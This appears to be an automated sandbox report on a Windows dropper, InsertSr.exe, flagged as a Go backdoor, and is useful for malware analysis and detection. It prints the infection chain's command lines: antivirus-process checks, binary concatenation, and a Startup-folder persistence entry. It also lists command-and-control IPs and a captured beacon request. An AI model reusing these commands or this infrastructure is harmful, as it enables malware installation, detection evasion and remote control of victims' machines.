
Windows Analysis Report
InsertSr.exe

Overview

General Information

Sample name: InsertSr.exe
Analysis ID: 1565338
MD5: c4c26460f0f0fc5f6acb5a9dca7d251c
SHA1: 5a9a4337d0159af2d23457a396ebc4db5114aabf
SHA256: 68da2cf9516fa5b50b96c7b63d3fab3149497226c3ee7b444f5be1d292df4a20
Tags: exe, solvolume-fun, user-aachum

Detection

GO Backdoor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
Drops PE files with a suspicious file extension
Found Tor onion address
Injects a PE file into a foreign processes
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • InsertSr.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\InsertSr.exe" MD5: C4C26460F0F0FC5F6ACB5A9DCA7D251C)
    • cmd.exe (PID: 6732 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5012 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4052 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5824 cmdline: cmd /c md 316094 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5840 cmdline: findstr /V "SequenceOctoberContributionRef" Recreation MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6864 cmdline: cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Intranet.pif (PID: 6448 cmdline: Intranet.pif u MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 6464 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Intranet.pif (PID: 1292 cmdline: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • choice.exe (PID: 2036 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 5204 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Virtuoso.scr (PID: 3748 cmdline: "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • Virtuoso.scr (PID: 2404 cmdline: "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: Intranet.pif PID: 1292 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |
Process Memory Space: Virtuoso.scr PID: 2404 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |

      System Summary

      Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine|base64offset|contains: *', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , ProcessId: 5204, ProcessName: wscript.exe
      Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Intranet.pif u, CommandLine: Intranet.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: Intranet.pif u, ProcessId: 6448, ProcessName: Intranet.pif
      Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, ProcessId: 6448, TargetFilename: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
      Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\InsertSr.exe", ParentImage: C:\Users\user\Desktop\InsertSr.exe, ParentProcessId: 6552, ParentProcessName: InsertSr.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, ProcessId: 6732, ProcessName: cmd.exe
      Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif, ProcessId: 6448, TargetFilename: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
      Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , CommandLine|base64offset|contains: *', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" , ProcessId: 5204, ProcessName: wscript.exe

      Data Obfuscation

      Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started | Author: Joe Security | Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 4052, ProcessName: findstr.exe

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-29T16:25:40.862913+0100 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 109.172.87.135 | 22016 | TCP
      2024-11-29T16:26:09.536154+0100 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 109.172.87.135 | 22016 | TCP
      2024-11-29T16:26:09.968816+0100 | 2855538 | 1 | A Network Trojan was detected | 109.172.87.135 | 22016 | 192.168.2.6 | 49730 | TCP
      2024-11-29T16:25:40.860487+0100 | 2855539 | 1 | A Network Trojan was detected | 109.172.87.135 | 22016 | 192.168.2.6 | 49730 | TCP


      AV Detection

      Source: InsertSr.exe | ReversingLabs: Detection: 15%
      Source: InsertSr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: InsertSr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00504005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00504005
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0050C2FF
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0050494A
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050CD14 FindFirstFileW,FindClose,19_2_0050CD14
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0050CD9F
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0050F5D8
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0050F735
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0050FA36
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00503CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00503CE2
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_001E4005
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_001EC2FF
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001E494A GetFileAttributesW,FindFirstFileW,FindClose,22_2_001E494A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001ECD14 FindFirstFileW,FindClose,22_2_001ECD14
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_001ECD9F
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_001EF5D8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_001EF735
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_001EFA36
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_001E3CE2
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\316094\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\316094
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\

      Networking

      Source: Network traffic | Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.87.135:22016 -> 192.168.2.6:49730
      Source: Network traffic | Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.6:49730 -> 109.172.87.135:22016
      Source: Network traffic | Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.6:49730 -> 109.172.87.135:22016
      Source: Network traffic | Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.87.135:22016 -> 192.168.2.6:49730
      Source: Intranet.pif, 00000013.00000002.3380744209.0000000000C00000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: Virtuoso.scr, 00000016.00000002.3380712170.0000000000A00000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: global traffic | TCP traffic: 192.168.2.6:49730 -> 109.172.87.135:22016
      Source: Joe Sandbox View | IP Address: 46.8.232.106
      Source: Joe Sandbox View | IP Address: 188.130.206.243
      Source: Joe Sandbox View | ASN Name: SUMTEL-AS-RIPE (Moscow, Russia, RU)
      Source: unknown | DNS traffic detected: query: qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi replaycode: Name error (3)
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_005129BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_005129BA
      Source: global traffic | DNS traffic detected: DNS query: qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi
      Source: unknown | HTTP traffic detected:
      POST / HTTP/1.1
      Host: 46.8.232.106
      User-Agent: Go-http-client/1.1
      Content-Length: 162
      X-Api-Key: GBhb1vep
      Accept-Encoding: gzip
